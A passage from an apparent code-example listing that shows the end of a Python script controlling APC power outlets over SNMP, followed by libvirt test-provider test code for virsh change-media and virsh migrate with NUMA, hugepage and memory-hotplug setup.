    args_status.append(apc_command)

    args_off.append("/usr/bin/snmpset")
    args_off.append("-Oqu")  # sets printing options
    args_off.append("-v")
    args_off.append("1")
    args_off.append("-c")
    args_off.append("private")
    args_off.append("-m")
    args_off.append("ALL")
    args_off.append(address)
    args_off.append(apc_command)
    args_off.append("i")
    args_off.append("outletOff")

    args_on.append("/usr/bin/snmpset")
    args_on.append("-Oqu")  # sets printing options
    args_on.append("-v")
    args_on.append("1")
    args_on.append("-c")
    args_on.append("private")
    args_on.append("-m")
    args_on.append("ALL")
    args_on.append(address)
    args_on.append(apc_command)
    args_on.append("i")
    args_on.append("outletOn")

    cmdstr_status = ' '.join(args_status)
    cmdstr_off = ' '.join(args_off)
    cmdstr_on = ' '.join(args_on)

# This section issues the actual commands. Reboot is split into
# Off, then On to make certain both actions work as planned.
#
# The status command just dumps the outlet status to stdout.
# The status checks that are made when turning an outlet on or off, though,
# use the execWithCaptureStatus so that the stdout from snmpget can be
# examined and the desired operation confirmed.

    if status_check:
        if verbose:
            fd = open("/tmp/apclog", "w")
            fd.write("Attempting the following command: %s\n" % cmdstr_status)
        strr = os.system(cmdstr_status)
        print strr
        if verbose:
            fd.write("Result: %s\n" % strr)
            fd.close()

    else:
        if action == POWER_OFF:
            if verbose:
                fd = open("/tmp/apclog", "w")
                fd.write("Attempting the following command: %s\n" % cmdstr_off)
            strr = os.system(cmdstr_off)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
                fd.close()
            if strr.find(POWER_OFF) >= 0:
                print "Success. Outlet off"
                sys.exit(0)
            else:
                if verbose:
                    fd.write("Unable to power off apc outlet")
                    fd.close()
                sys.exit(1)

        elif action == POWER_ON:
            if verbose:
                fd = open("/tmp/apclog", "w")
                fd.write("Attempting the following command: %s\n" % cmdstr_on)
            strr = os.system(cmdstr_on)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            #strr = os.system(cmdstr_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
            if strr.find(POWER_ON) >= 0:
                if verbose:
                    fd.close()
                print "Success. Outlet On."
                sys.exit(0)
            else:
                print "Unable to power on apc outlet"
                if verbose:
                    fd.write("Unable to power on apc outlet")
                    fd.close()
                sys.exit(1)

        elif action == POWER_REBOOT:
            if verbose:
                fd = open("/tmp/apclog", "w")
                fd.write("Attempting the following command: %s\n" % cmdstr_off)
            strr = os.system(cmdstr_off)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            #strr = os.system(cmdstr_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
            if strr.find(POWER_OFF) < 0:
                print "Unable to power off apc outlet"
                if verbose:
                    fd.write("Unable to power off apc outlet")
                    fd.close()
                sys.exit(1)

            if verbose:
                fd.write("Attempting the following command: %s\n" % cmdstr_on)
            strr = os.system(cmdstr_on)
            time.sleep(1)
            strr, code = execWithCaptureStatus("/usr/bin/snmpget", args_status)
            #strr = os.system(cmdstr_status)
            if verbose:
                fd.write("Result: %s\n" % strr)
            if strr.find(POWER_ON) >= 0:
                if verbose:
                    fd.close()
                print "Success: Outlet Rebooted."
                sys.exit(0)
            else:
                print "Unable to power on apc outlet"
                if verbose:
                    fd.write("Unable to power on apc outlet")
                    fd.close()
                sys.exit(1)

Example 5

View license
def run(test, params, env):
    """
    Test command: virsh change-media.

    The command changes the media used by CD or floppy drives.

    Test steps:
    1. Prepare test environment.
    2. Perform virsh change-media operation.
    3. Recover test environment.
    4. Confirm the test result.
    """

    def is_attached(vmxml_devices, disk_type, source_file, target_dev):
        """
        Check attached device and disk exist or not.

        :param vmxml_devices: VMXMLDevices instance
        :param disk_type: disk's device type: cdrom or floppy
        :param source_file : disk's source file to check
        :param target_dev : target device name
        :return: True/False if backing file and device found
        """
        disks = vmxml_devices.by_device_tag('disk')
        for disk in disks:
            if disk.device != disk_type:
                continue
            if disk.target['dev'] != target_dev:
                continue
            if disk.xmltreefile.find('source') is not None:
                if disk.source.attrs['file'] != source_file:
                    continue
            else:
                continue
            # All three conditions met
            logging.debug("Find %s in given disk XML", source_file)
            return True
        logging.debug("Not find %s in gievn disk XML", source_file)
        return False

    def check_result(vm_name, disk_source, disk_type, disk_target,
                     flags, vm_state, attach=True):
        """
        Check the test result of attach/detach-device command.
        """
        active_vmxml = vm_xml.VMXML.new_from_dumpxml(vm_name)
        active_attached = is_attached(active_vmxml.devices, disk_type,
                                      disk_source, disk_target)
        if vm_state != "transient":
            inactive_vmxml = vm_xml.VMXML.new_from_dumpxml(vm_name,
                                                           options="--inactive")
            inactive_attached = is_attached(inactive_vmxml.devices, disk_type,
                                            disk_source, disk_target)

        if flags.count("config") and not flags.count("live"):
            if vm_state != "transient":
                if attach:
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --config options used for"
                                                  " attachment")
                    if vm_state != "shutoff":
                        if active_attached:
                            raise exceptions.TestFail("Active domain XML updated"
                                                      " when --config options used"
                                                      " for attachment")
                else:
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --config options used for"
                                                  " detachment")
                    if vm_state != "shutoff":
                        if not active_attached:
                            raise exceptions.TestFail("Active domain XML updated"
                                                      " when --config options used"
                                                      " for detachment")
        elif flags.count("live") and not flags.count("config"):
            if attach:
                if vm_state in ["paused", "running", "transient"]:
                    if not active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --live options used for"
                                                  " attachment")
                if vm_state in ["paused", "running"]:
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated"
                                                  " when --live options used for"
                                                  " attachment")
            else:
                if vm_state in ["paused", "running", "transient"]:
                    if active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --live options used for"
                                                  " detachment")
                if vm_state in ["paused", "running"]:
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated"
                                                  " when --live options used for"
                                                  " detachment")
        elif flags.count("live") and flags.count("config"):
            if attach:
                if vm_state in ["paused", "running"]:
                    if not active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --live --config options"
                                                  " used for attachment")
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --live --config options "
                                                  "used for attachment")
            else:
                if vm_state in ["paused", "running"]:
                    if active_attached:
                        raise exceptions.TestFail("Active domain XML not updated "
                                                  "when --live --config options "
                                                  "used for detachment")
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML not updated"
                                                  " when --live --config options "
                                                  "used for detachment")
        elif flags.count("current") or flags == "":
            if attach:
                if vm_state in ["paused", "running", "transient"]:
                    if not active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --current options used "
                                                  "for attachment")
                if vm_state in ["paused", "running"]:
                    if inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated "
                                                  "when --current options used "
                                                  "for live attachment")
                if vm_state == "shutoff" and not inactive_attached:
                    raise exceptions.TestFail("Inactive domain XML not updated "
                                              "when --current options used for "
                                              "attachment")
            else:
                if vm_state in ["paused", "running", "transient"]:
                    if active_attached:
                        raise exceptions.TestFail("Active domain XML not updated"
                                                  " when --current options used "
                                                  "for detachment")
                if vm_state in ["paused", "running"]:
                    if not inactive_attached:
                        raise exceptions.TestFail("Inactive domain XML updated "
                                                  "when --current options used "
                                                  "for live detachment")
                if vm_state == "shutoff" and inactive_attached:
                    raise exceptions.TestFail("Inactive domain XML not updated "
                                              "when --current options used for "
                                              "detachment")

    vm_name = params.get("main_vm")
    vm = env.get_vm(vm_name)
    vm_ref = params.get("change_media_vm_ref")
    action = params.get("change_media_action")
    action_twice = params.get("change_media_action_twice", "")
    pre_vm_state = params.get("pre_vm_state")
    options = params.get("change_media_options")
    options_twice = params.get("change_media_options_twice", "")
    device_type = params.get("change_media_device_type", "cdrom")
    target_device = params.get("change_media_target_device", "hdc")
    init_iso_name = params.get("change_media_init_iso")
    old_iso_name = params.get("change_media_old_iso")
    new_iso_name = params.get("change_media_new_iso")
    virsh_dargs = {"debug": True, "ignore_status": True}

    if device_type not in ['cdrom', 'floppy']:
        raise exceptions.TestSkipError("Got a invalid device type:/n%s"
                                       % device_type)

    # Backup for recovery.
    vmxml_backup = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)

    old_iso = os.path.join(data_dir.get_tmp_dir(), old_iso_name)
    new_iso = os.path.join(data_dir.get_tmp_dir(), new_iso_name)

    if vm_ref == "name":
        vm_ref = vm_name

    if vm.is_alive():
        vm.destroy(gracefully=False)

    try:
        if not init_iso_name:
            init_iso = ""
        else:
            init_iso = os.path.join(data_dir.get_tmp_dir(),
                                    init_iso_name)

        # Prepare test files.
        libvirt.create_local_disk("iso", old_iso)
        libvirt.create_local_disk("iso", new_iso)

        # Check domain's disk device
        disk_blk = vm_xml.VMXML.get_disk_blk(vm_name)
        logging.info("disk_blk %s", disk_blk)
        if target_device not in disk_blk:
            if vm.is_alive():
                virsh.destroy(vm_name)
            logging.info("Adding device")
            libvirt.create_local_disk("iso", init_iso)
            disk_params = {"disk_type": "file", "device_type": device_type,
                           "driver_name": "qemu", "driver_type": "raw",
                           "target_bus": "ide", "readonly": "yes"}
            libvirt.attach_additional_device(vm_name, target_device,
                                             init_iso, disk_params)

        vmxml_for_test = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
        # Turn VM into certain state.
        if pre_vm_state == "running":
            logging.info("Starting %s..." % vm_name)
            if vm.is_dead():
                vm.start()
                vm.wait_for_login().close()
        elif pre_vm_state == "shutoff":
            logging.info("Shuting down %s..." % vm_name)
            if vm.is_alive():
                vm.destroy(gracefully=False)
        elif pre_vm_state == "paused":
            logging.info("Pausing %s..." % vm_name)
            if vm.is_dead():
                vm.start()
                vm.wait_for_login().close()
            if not vm.pause():
                raise exceptions.TestSkipError("Cann't pause the domain")
            time.sleep(5)
        elif pre_vm_state == "transient":
            logging.info("Creating %s..." % vm_name)
            vm.undefine()
            if virsh.create(vmxml_for_test.xml, **virsh_dargs).exit_status:
                vmxml_backup.define()
                raise exceptions.TestSkipError("Cann't create the domain")

        # Libvirt will ignore --source when action is eject
        attach = True
        device_source = old_iso
        if action == "--eject ":
            source = ""
            attach = False
        else:
            source = device_source

        all_options = action + options + " " + source
        ret = virsh.change_media(vm_ref, target_device,
                                 all_options, ignore_status=True, debug=True)
        status_error = False
        if pre_vm_state == "shutoff":
            if options.count("live"):
                status_error = True
        elif pre_vm_state == "transient":
            if options.count("config"):
                status_error = True

        if vm.is_paused():
            vm.resume()
            vm.wait_for_login().close()
            # For paused vm, change_media for eject/update operation
            # should be executed again for it takes effect
            if ret.exit_status:
                if not action.count("insert") and not options.count("force"):
                    ret = virsh.change_media(vm_ref, target_device, all_options,
                                             ignore_status=True, debug=True)
        if not status_error and ret.exit_status:
            raise exceptions.TestFail("Please check: Bug 1289069 - Ejecting "
                                      "locked cdrom tray using update-device"
                                      " fails but next try succeeds")
        libvirt.check_exit_status(ret, status_error)
        if not ret.exit_status:
            check_result(vm_name, device_source, device_type, target_device,
                         options, pre_vm_state, attach)

        if action_twice:
            if pre_vm_state == "paused":
                if not vm.pause():
                    raise exceptions.TestFail("Cann't pause the domain")
                time.sleep(5)
            attach = True
            device_source = new_iso
            if action_twice == "--eject ":
                #options_twice += " --force "
                source = ""
                attach = False
            else:
                source = device_source
            all_options = action_twice + options_twice + " " + source
            time.sleep(5)
            ret = virsh.change_media(vm_ref, target_device, all_options,
                                     ignore_status=True, debug=True)
            status_error = False
            if pre_vm_state == "shutoff":
                if options_twice.count("live"):
                    status_error = True
            elif pre_vm_state == "transient":
                if options_twice.count("config"):
                    status_error = True

            if action_twice == "--insert ":
                if pre_vm_state in ["running", "paused"]:
                    if options in ["--force", "--current", "", "--live"]:
                        if options_twice.count("config"):
                            status_error = True
                    elif options == "--config":
                        if options_twice in ["--force", "--current", ""]:
                            status_error = True
                        elif options_twice.count("live"):
                            status_error = True
                elif pre_vm_state == "transient":
                    if ret.exit_status:
                        status_error = True
                elif pre_vm_state == "shutoff":
                    if options.count("live"):
                        status_error = True
            if vm.is_paused():
                vm.resume()
                vm.wait_for_login().close()
                # For paused vm, change_media for eject/update operation
                # should be executed again for it takes effect
                if ret.exit_status and not action_twice.count("insert"):
                    ret = virsh.change_media(vm_ref, target_device, all_options,
                                             ignore_status=True, debug=True)
            if not status_error and ret.exit_status:
                raise exceptions.TestFail("Please check: Bug 1289069 - Ejecting "
                                          "locked cdrom tray using update-device"
                                          " fails but next try succeeds")
            libvirt.check_exit_status(ret, status_error)
            if not ret.exit_status:
                check_result(vm_name, device_source, device_type, target_device,
                             options_twice, pre_vm_state, attach)

        # Try to start vm.
        if vm.is_dead():
            vm.start()
            vm.wait_for_login().close()
    finally:
        if vm.is_alive():
            vm.destroy(gracefully=False)
        # Recover xml of vm.
        vmxml_backup.sync()
        # Remove disks
        if os.path.exists(init_iso):
            os.remove(init_iso)
        if os.path.exists(old_iso):
            os.remove(old_iso)
        if os.path.exists(init_iso):
            os.remove(new_iso)

Example 6

Project: tp-libvirt
Source File: virsh_migrate.py
View license
def run(test, params, env):
    """
    Test virsh migrate command.
    """

    def check_vm_state(vm, state):
        """
        Return True if vm is in the correct state.
        """
        actual_state = vm.state()
        if cmp(actual_state, state) == 0:
            return True
        else:
            return False

    def cleanup_dest(vm, src_uri=""):
        """
        Clean up the destination host environment
        when doing the uni-direction migration.
        """
        logging.info("Cleaning up VMs on %s" % vm.connect_uri)
        try:
            if virsh.domain_exists(vm.name, uri=vm.connect_uri):
                vm_state = vm.state()
                if vm_state == "paused":
                    vm.resume()
                elif vm_state == "shut off":
                    vm.start()
                vm.destroy(gracefully=False)

                if vm.is_persistent():
                    vm.undefine()

        except Exception, detail:
            logging.error("Cleaning up destination failed.\n%s" % detail)

        if src_uri:
            vm.connect_uri = src_uri

    def check_migration_result(migration_res):
        """
        Check the migration result.

        :param migration_res: the CmdResult of migration

        :raise: exceptions.TestSkipError when some known messages found
        """
        logging.debug("Migration result:\n%s" % migration_res)
        if migration_res.stderr.find("error: unsupported configuration:") >= 0:
            raise exceptions.TestSkipError(migration_res.stderr)

    def do_migration(delay, vm, dest_uri, options, extra):
        logging.info("Sleeping %d seconds before migration" % delay)
        time.sleep(delay)
        # Migrate the guest.
        migration_res = vm.migrate(dest_uri, options, extra, True, True)
        logging.info("Migration exit status: %d", migration_res.exit_status)
        check_migration_result(migration_res)
        if int(migration_res.exit_status) != 0:
            logging.error("Migration failed for %s." % vm_name)
            return False

        if options.count("dname") or extra.count("dname"):
            vm.name = extra.split()[1].strip()

        if vm.is_alive():  # vm.connect_uri was updated
            logging.info("Alive guest found on destination %s." % dest_uri)
        else:
            if not options.count("offline"):
                logging.error("VM not alive on destination %s" % dest_uri)
                return False

        # Throws exception if console shows panic message
        vm.verify_kernel_crash()
        return True

    def numa_pin(memory_mode, memnode_mode, numa_dict_list, host_numa_node):
        """
        creates dictionary numatune memory
        creates list of dictionaries for numatune memnode

        :param memory_mode: memory mode of guest numa
        :param memnode_mode: memory mode list for each specific node
        :param numa_dict_list: list of guest numa
        :param host_numa_node: list of host numa
        :return: list of memnode dictionaries
        :return: memory dictionary
        """
        memory_placement = params.get("memory_placement", "static")
        memnode_list = []
        memory = {}
        memory['mode'] = str(memory_mode)
        memory['placement'] = str(memory_placement)

        if (len(numa_dict_list) == 1):
            # 1 guest numa available due to 1 vcpu then pin it
            # with one host numa
            memnode_dict = {}
            memory['nodeset'] = str(host_numa_node[0])
            memnode_dict['cellid'] = "0"
            memnode_dict['mode'] = str(memnode_mode[0])
            memnode_dict['nodeset'] = str(memory['nodeset'])
            memnode_list.append(memnode_dict)

        else:
            for index in range(2):
                memnode_dict = {}
                memnode_dict['cellid'] = str(index)
                memnode_dict['mode'] = str(memnode_mode[index])
                if (len(host_numa_node) == 1):
                    # Both guest numa pinned to same host numa as 1 hostnuma
                    # available
                    memory['nodeset'] = str(host_numa_node[0])
                    memnode_dict['nodeset'] = str(memory['nodeset'])
                else:
                    # Both guest numa pinned to different host numa
                    memory['nodeset'] = "%s,%s" % (str(host_numa_node[0]),
                                                   str(host_numa_node[1]))
                    memnode_dict['nodeset'] = str(host_numa_node[index])
                memnode_list.append(memnode_dict)
        return memory, memnode_list

    def create_numa(vcpu, max_mem, max_mem_unit):
        """
        creates list of dictionaries of numa

        :param vcpu: vcpus of existing guest
        :param max_mem: max_memory of existing guest
        :param max_mem_unit: unit of max_memory
        :return: numa dictionary list
        """
        numa_dict = {}
        numa_dict_list = []
        if vcpu == 1:
            numa_dict['id'] = '0'
            numa_dict['cpus'] = '0'
            numa_dict['memory'] = str(max_mem)
            numa_dict['unit'] = str(max_mem_unit)
            numa_dict_list.append(numa_dict)
        else:
            for index in range(2):
                numa_dict['id'] = str(index)
                numa_dict['memory'] = str(max_mem / 2)
                numa_dict['unit'] = str(max_mem_unit)
                if vcpu == 2:
                    numa_dict['cpus'] = "%s" % str(index)
                else:
                    if index == 0:
                        if vcpu == 3:
                            numa_dict['cpus'] = "%s" % str(index)
                        if vcpu > 3:
                            numa_dict['cpus'] = "%s-%s" % (str(index),
                                                           str(vcpu / 2 - 1))
                    else:
                        numa_dict['cpus'] = "%s-%s" % (str(vcpu / 2),
                                                       str(vcpu - 1))
                numa_dict_list.append(numa_dict)
                numa_dict = {}
        return numa_dict_list

    def enable_hugepage(vmname, no_of_HPs, hp_unit='', hp_node='', pin=False,
                        node_list=[], host_hp_size=0, numa_pin=False):
        """
        creates list of dictionaries of page tag for HP

        :param vmname: name of the guest
        :param no_of_HPs: Number of hugepages
        :param hp_unit: unit of HP size
        :param hp_node: number of numa nodes to be HP pinned
        :param pin: flag to pin HP with guest numa or not
        :param node_list: Numa node list
        :param host_hp_size: size of the HP to pin with guest numa
        :param numa_pin: flag to numa pin
        :return: list of page tag dictionary for HP pin
        """
        dest_machine = params.get("migrate_dest_host")
        server_user = params.get("server_user", "root")
        server_pwd = params.get("server_pwd")
        command = "cat /proc/meminfo | grep HugePages_Free"
        server_session = remote.wait_for_login('ssh', dest_machine, '22',
                                               server_user, server_pwd,
                                               r"[\#\$]\s*$")
        cmd_output = server_session.cmd_status_output(command)
        server_session.close()
        if (cmd_output[0] == 0):
            dest_HP_free = cmd_output[1].strip('HugePages_Free:').strip()
        else:
            raise error.TestNAError("HP not supported/configured")
        hp_list = []

        # setting hugepages in destination machine here as remote ssh
        # configuration is done
        hugepage_assign(str(no_of_HPs), target_ip=dest_machine,
                        user=server_user, password=server_pwd)
        logging.debug("Remote host hugepage config done")
        if numa_pin:
            for each_node in node_list:
                if (each_node['mode'] == 'strict'):
                    # reset source host hugepages
                    if int(utils_memory.get_num_huge_pages() > 0):
                        logging.debug("reset source host hugepages")
                        hugepage_assign("0")
                    # reset dest host hugepages
                    if (int(dest_HP_free) > 0):
                        logging.debug("reset dest host hugepages")
                        hugepage_assign("0", target_ip=dest_machine,
                                        user=server_user, password=server_pwd)
                    # set source host hugepages for the specific node
                    logging.debug("set src host hugepages for specific node")
                    hugepage_assign(str(no_of_HPs), node=each_node['nodeset'],
                                    hp_size=str(host_hp_size))
                    # set dest host hugepages for specific node
                    logging.debug("set dest host hugepages for specific node")
                    hugepage_assign(str(no_of_HPs), target_ip=dest_machine,
                                    node=each_node['nodeset'], hp_size=str(
                                    host_hp_size), user=server_user,
                                    password=server_pwd)
        if not pin:
            vm_xml.VMXML.set_memoryBacking_tag(vmname)
            logging.debug("Hugepage without pin")
        else:
            hp_dict = {}
            hp_dict['size'] = str(host_hp_size)
            hp_dict['unit'] = str(hp_unit)
            if int(hp_node) == 1:
                hp_dict['nodeset'] = "0"
                logging.debug("Hugepage with pin to 1 node")
            else:
                hp_dict['nodeset'] = "0-1"
                logging.debug("Hugepage with pin to both nodes")
            hp_list.append(hp_dict)
            logging.debug(hp_list)
        return hp_list

    def hugepage_assign(hp_num, target_ip='', node='', hp_size='', user='',
                        password=''):
        """
        Allocates hugepages for src and dst machines

        :param hp_num: number of hugepages
        :param target_ip: ip address of destination machine
        :param node: numa node to which HP have to be allocated
        :param hp_size: hugepage size
        :param user: remote machine's username
        :param password: remote machine's password
        """
        command = ""
        if node == '':
            if target_ip == '':
                utils_memory.set_num_huge_pages(int(hp_num))
            else:
                command = "echo %s > /proc/sys/vm/nr_hugepages" % (hp_num)
        else:
            command = "echo %s > /sys/devices/system/node/node" % (hp_num)
            command += "%s/hugepages/hugepages-%skB/" % (str(node), hp_size)
            command += "nr_hugepages"
        if command != "":
            if target_ip != "":
                server_session = remote.wait_for_login('ssh', target_ip, '22',
                                                       user, password,
                                                       r"[\#\$]\s*$")
                cmd_output = server_session.cmd_status_output(command)
                server_session.close()
                if (cmd_output[0] != 0):
                    raise error.TestNAError("HP not supported/configured")
            else:
                process.system_output(command, verbose=True, shell=True)

    def create_mem_hotplug_xml(mem_size, mem_unit, numa_node='',
                               mem_model='dimm'):
        """
        Forms and return memory device xml for hotplugging

        :param mem_size: memory to be hotplugged
        :param mem_unit: unit for memory size
        :param numa_node: numa node to which memory is hotplugged
        :param mem_model: memory model to be hotplugged
        :return: xml with memory device
        """
        mem_xml = memory.Memory()
        mem_xml.mem_model = mem_model
        target_xml = memory.Memory.Target()
        target_xml.size = mem_size
        target_xml.size_unit = mem_unit
        if numa_node:
            target_xml.node = int(numa_node)
        mem_xml.target = target_xml
        logging.debug(mem_xml)
        mem_xml_file = os.path.join(data_dir.get_tmp_dir(),
                                    'memory_hotplug.xml')
        try:
            fp = open(mem_xml_file, 'w')
        except Exception, info:
            raise exceptions.TestError(info)
        fp.write(str(mem_xml))
        fp.close()
        return mem_xml_file

    def check_migration_timeout_suspend(params):
        """
        Handle option '--timeout --timeout-suspend'.
        As the migration thread begins to execute, this function is executed
        at same time almostly. It will sleep the specified seconds and check
        the VM state on both hosts. Both should be 'paused'.

        :param params: The parameters used

        :raise: exceptions.TestFail if the VM state is not as expected
        """
        timeout = int(params.get("timeout_before_suspend", 5))
        server_ip = params.get("server_ip")
        server_user = params.get("server_user", "root")
        server_pwd = params.get("server_pwd")
        vm_name = params.get("migrate_main_vm")
        vm = params.get("vm_migration")
        logging.debug("Wait for %s seconds as specified by --timeout", timeout)
        # --timeout <seconds> --timeout-suspend means the vm state will change
        # to paused when live migration exceeds <seconds>. Here migration
        # command is executed on a separate thread asynchronously, so there
        # may need seconds to run the thread and other helper function logic
        # before virsh migrate command is executed. So a buffer is suggested
        # to be added to avoid of timing gap. '1' second is a usable choice.
        time.sleep(timeout + 1)
        logging.debug("Check vm state on source host after timeout")
        vm_state = vm.state()
        if vm_state != "paused":
            raise exceptions.TestFail("After timeout '%s' seconds, "
                                      "the vm state on source host should "
                                      "be 'paused', but %s found",
                                      timeout, vm_state)
        logging.debug("Check vm state on target host after timeout")
        virsh_dargs = {'remote_ip': server_ip, 'remote_user': server_user,
                       'remote_pwd': server_pwd, 'unprivileged_user': None,
                       'ssh_remote_auth': True}
        new_session = virsh.VirshPersistent(**virsh_dargs)
        vm_state = new_session.domstate(vm_name).stdout.strip()
        if vm_state != "paused":
            raise exceptions.TestFail("After timeout '%s' seconds, "
                                      "the vm state on target host should "
                                      "be 'paused', but %s found",
                                      timeout, vm_state)
        new_session.close_session()

    for v in params.itervalues():
        if isinstance(v, str) and v.count("EXAMPLE"):
            raise exceptions.TestSkipError("Please set real value for %s" % v)

    # Check the required parameters
    extra = params.get("virsh_migrate_extra")
    migrate_uri = params.get("virsh_migrate_migrateuri", None)
    # Add migrateuri if exists and check for default example
    if migrate_uri:
        extra = ("%s --migrateuri=%s" % (extra, migrate_uri))

    graphics_uri = params.get("virsh_migrate_graphics_uri", "")
    if graphics_uri:
        extra = "--graphicsuri %s" % graphics_uri

    shared_storage = params.get("migrate_shared_storage", "")
    # use default image jeos-23-64
    if shared_storage == "":
        default_guest_asset = defaults.get_default_guest_os_info()['asset']
        shared_storage = params.get("nfs_mount_dir")
        shared_storage += ('/' + default_guest_asset + '.qcow2')

    options = params.get("virsh_migrate_options")
    # Direct migration is supported only for Xen in libvirt
    if options.count("direct") or extra.count("direct"):
        if params.get("driver_type") is not "xen":
            raise error.TestNAError("Direct migration is supported only for "
                                    "Xen in libvirt.")

    if (options.count("compressed") and not
            virsh.has_command_help_match("migrate", "--compressed")):
        raise error.TestNAError("Do not support compressed option "
                                "on this version.")

    if (options.count("graphicsuri") and not
            virsh.has_command_help_match("migrate", "--graphicsuri")):
        raise error.TestNAError("Do not support 'graphicsuri' option"
                                "on this version.")

    src_uri = params.get("virsh_migrate_connect_uri")
    dest_uri = params.get("virsh_migrate_desturi")

    graphics_server = params.get("graphics_server")
    if graphics_server:
        try:
            remote_viewer_executable = path.find_command('remote-viewer')
        except path.CmdNotFoundError:
            raise error.TestNAError("No 'remote-viewer' command found.")

    vm_name = params.get("migrate_main_vm")
    vm = env.get_vm(vm_name)
    vm.verify_alive()

    # For safety reasons, we'd better back up  xmlfile.
    orig_config_xml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    if not orig_config_xml:
        raise exceptions.TestError("Backing up xmlfile failed.")

    vmxml = orig_config_xml.copy()
    graphic = vmxml.get_device_class('graphics')()

    # Params to update disk using shared storage
    params["disk_type"] = "file"
    params["disk_source_protocol"] = "netfs"
    params["mnt_path_name"] = params.get("nfs_mount_dir")

    # Params for NFS and SSH setup
    params["server_ip"] = params.get("migrate_dest_host")
    params["server_user"] = "root"
    params["server_pwd"] = params.get("migrate_dest_pwd")
    params["client_ip"] = params.get("migrate_source_host")
    params["client_user"] = "root"
    params["client_pwd"] = params.get("migrate_source_pwd")
    params["nfs_client_ip"] = params.get("migrate_dest_host")
    params["nfs_server_ip"] = params.get("migrate_source_host")

    # Params to enable SELinux boolean on remote host
    params["remote_boolean_varible"] = "virt_use_nfs"
    params["remote_boolean_value"] = "on"
    params["set_sebool_remote"] = "yes"

    server_ip = params.get("server_ip")
    server_user = params.get("server_user", "root")
    server_pwd = params.get("server_pwd")

    graphics_type = params.get("graphics_type")
    graphics_port = params.get("graphics_port")
    graphics_listen = params.get("graphics_listen")
    graphics_autoport = params.get("graphics_autoport", "yes")
    graphics_listen_type = params.get("graphics_listen_type")
    graphics_listen_addr = params.get("graphics_listen_addr")

    # Update graphic XML
    if graphics_type and graphic.get_type() != graphics_type:
        graphic.set_type(graphics_type)
    if graphics_port:
        graphic.port = graphics_port
    if graphics_autoport:
        graphic.autoport = graphics_autoport
    if graphics_listen:
        graphic.listen = graphics_listen
    if graphics_listen_type:
        graphic.listen_type = graphics_listen_type
    if graphics_listen_addr:
        graphic.listen_addr = graphics_listen_addr

    vm_ref = params.get("vm_ref", vm.name)
    delay = int(params.get("virsh_migrate_delay", 10))
    ping_count = int(params.get("ping_count", 5))
    ping_timeout = int(params.get("ping_timeout", 10))
    status_error = params.get("status_error", 'no')
    libvirtd_state = params.get("virsh_migrate_libvirtd_state", 'on')
    src_state = params.get("virsh_migrate_src_state", "running")
    enable_numa = "yes" == params.get("virsh_migrate_with_numa", "no")
    enable_numa_pin = "yes" == params.get("virsh_migrate_with_numa_pin", "no")
    enable_HP = "yes" == params.get("virsh_migrate_with_HP", "no")
    enable_HP_pin = "yes" == params.get("virsh_migrate_with_HP_pin", "no")
    postcopy_cmd = params.get("virsh_postcopy_cmd", "")
    postcopy_timeout = int(params.get("postcopy_migration_timeout", "180"))
    mem_hotplug = "yes" == params.get("virsh_migrate_mem_hotplug", "no")
    # min memory that can be hotplugged 256 MiB - 256 * 1024 = 262144
    mem_hotplug_size = int(params.get("virsh_migrate_hotplug_mem", "262144"))
    mem_hotplug_count = int(params.get("virsh_migrate_mem_hotplug_count", "1"))
    mem_size_unit = params.get("virsh_migrate_hotplug_mem_unit", "KiB")

    # To check Unsupported conditions for Numa scenarios
    if enable_numa_pin:
        host_numa_node = utils_misc.NumaInfo()
        host_numa_node_list = host_numa_node.online_nodes
        memory_mode = params.get("memory_mode", 'strict')
        vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
        vcpu = vmxml.vcpu

        # To check if Host numa node available
        if (len(host_numa_node_list) == 0):
            raise error.TestNAError("No host numa node available to pin")

        # To check preferred memory mode not used for 2 numa nodes
        # if vcpu > 1, two guest Numa nodes are created in create_numa()
        if (int(vcpu) > 1) and (memory_mode == "preferred"):
            raise error.TestNAError("NUMA memory tuning in preferred mode only"
                                    " supports single node")

    # To check if Hugepage supported and configure
    if enable_HP or enable_HP_pin:
        try:
            hp_obj = test_setup.HugePageConfig(params)
            host_hp_size = hp_obj.get_hugepage_size()
            # libvirt xml takes HP sizes in KiB
            default_hp_unit = "KiB"
            hp_pin_nodes = int(params.get("HP_pin_node_count", "2"))
            vm_max_mem = vmxml.max_mem
            no_of_HPs = int(vm_max_mem / host_hp_size) + 1
            # setting hugepages in source machine
            if (int(utils_memory.get_num_huge_pages_free()) < no_of_HPs):
                hugepage_assign(str(no_of_HPs))
            logging.debug("Hugepage support check done on host")
        except:
            raise error.TestNAError("HP not supported/configured")

    # To check mem hotplug should not exceed maxmem
    if mem_hotplug:
        # To check memory hotplug is supported by libvirt, memory hotplug
        # support QEMU/KVM driver was added in 1.2.14 version of libvirt
        if not libvirt_version.version_compare(1, 2, 14):
            raise exceptions.TestSkipError("Memory Hotplug is not supported")

        # hotplug memory in KiB
        vmxml_backup = vm_xml.VMXML.new_from_dumpxml(vm_name)
        vm_max_dimm_slots = int(params.get("virsh_migrate_max_dimm_slots",
                                           "32"))
        vm_hotplug_mem = mem_hotplug_size * mem_hotplug_count
        vm_current_mem = int(vmxml_backup.current_mem)
        vm_max_mem = int(vmxml_backup.max_mem)
